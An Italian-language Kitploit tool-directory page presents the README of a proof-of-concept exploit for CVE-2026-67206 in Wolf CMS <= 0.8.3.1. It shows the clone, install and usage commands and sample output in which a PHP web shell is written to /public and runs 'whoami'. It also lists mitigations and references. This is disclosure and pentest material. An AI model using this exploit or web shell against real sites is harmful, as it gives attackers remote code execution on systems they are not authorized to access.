Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-67206 — PoC exploit per Wolf CMS <= 0.8.3.1: autentica come Admin, scrive un file PHP arbitrario in /public tramite FileManagerController ed esegue comandi attraverso una web shell. | Kitploit
Strumenti/GitHubGitHub/anirbala98/cve-2026-67206
ExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubanirbala98/cve-2026-67206

CVE-2026-67206

PoC exploit per Wolf CMS <= 0.8.3.1: autentica come Admin, scrive un file PHP arbitrario in /public tramite FileManagerController ed esegue comandi attraverso una web shell.

Vedi Repository
191 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - RCE tramite scrittura arbitraria di file

Questo repository contiene un Proof of Concept (PoC) per l'exploit di CVE-2026-67206

Disclaimer

Questo progetto è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. Non utilizzarlo contro sistemi che non possiedi o per i quali non hai il permesso di effettuare test.

Panoramica

Esiste una vulnerabilità di scrittura arbitraria di file nelle versioni di Wolf CMS fino alla 0.8.3.1. Essa consente a un utente autenticato di scrivere file arbitrari e dannosi nella directory /public della root web tramite le funzioni create_file() e save() di FileManagerController.php. La funzione create_file() di FileManagerController.php non valida le estensioni dei file, consentendo quindi a utenti autenticati di scrivere script PHP dannosi e ottenere privilegi di esecuzione remota di codice.

Un'analisi dettagliata con analisi del codice sorgente e dimostrazione dell'exploit è disponibile sul mio blog Medium.

Versioni interessate

Tutte le versioni di Wolf CMS fino alla 0.8.3.1 sono interessate. Il repository di Wolf CMS è stato archiviato il 28 agosto 2021 e non è più mantenuto attivamente. Attualmente non esistono patch per questa vulnerabilità.

Requisiti

  • Python 3.13.14
  • Requests 2.32.5
  • Beautifulsoup4 4.15.0

Installazione

git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt

Utilizzo

python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin

Esempio

└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K 
[*] Accesso con le credenziali fornite...
[+] Accesso riuscito

[*] Creazione di un file denominato shell.php...
[+] Creazione del file riuscita

[*] Tentativo di scrittura del payload in shell.php...
[+] Payload scritto con successo!
[+] La web shell è accessibile con la query string 'cmd' all'indirizzo http://127.0.0.1:8080/public/shell.php
[+] Test dell'output di http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data

Mitigazione

  • Valida le estensioni dei file creati da utenti autenticati sulla base di una lista consentita
  • Non consentire estensioni come .php, .phtml, .phar, .php5 ecc., salvo che non siano strettamente necessarie
  • Non consentire l'esecuzione di PHP nelle directory di upload della root del server web
  • Se possibile, salva i file creati su un server diverso per ridurre al minimo l'impatto

Riferimenti

  • https://www.tenable.com/cve/CVE-2026-67206
  • https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-67206-0ad3ae08bc78
Scarica lo strumento